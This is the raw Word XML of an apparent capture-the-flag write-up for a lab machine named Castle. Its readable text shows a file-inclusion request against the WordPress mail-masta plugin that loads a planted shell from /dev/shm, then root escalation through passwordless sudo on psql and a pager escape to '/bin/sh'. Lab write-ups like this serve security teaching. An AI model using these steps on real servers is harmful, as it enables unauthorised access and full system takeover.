          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/dev/shm/shell.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e obtain a shell as the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">castle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92300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>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then access the home directory and retrieve the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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22400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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the user flag, we now need to escalate privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e observe that we can execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/psql </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as the root user without needing to provide a password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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20800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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According to the following reference:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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GTFOBins – psql</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/psql/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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escalate privileges by invoking the pager and escaping to a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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54100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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54100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And retrieve the final flag.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId37" w:type="default"/>
      <w:headerReference r:id="rId38" w:type="first"/>
      <w:headerReference r:id="rId39" w:type="even"/>
      <w:footerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42"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B">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="6"/>
    <w:bookmarkEnd w:id="6"/>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7" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12.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5C">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5D">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4.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50" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1.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Castle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32.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image32.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24.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql#r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1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.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22.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/psql/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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2.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napZBkzNjvL4mUS5qDfR/60JhQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnFvNW9saDUzdWNoMzIOaC5yamFsZWxncTV4ODMyDmguMTc1ZjVjczk0ejBvOAByITFmYk1JYWFZbUJFZDJsNlFQcFp4MDdXOGRIWEtXYTNONQ==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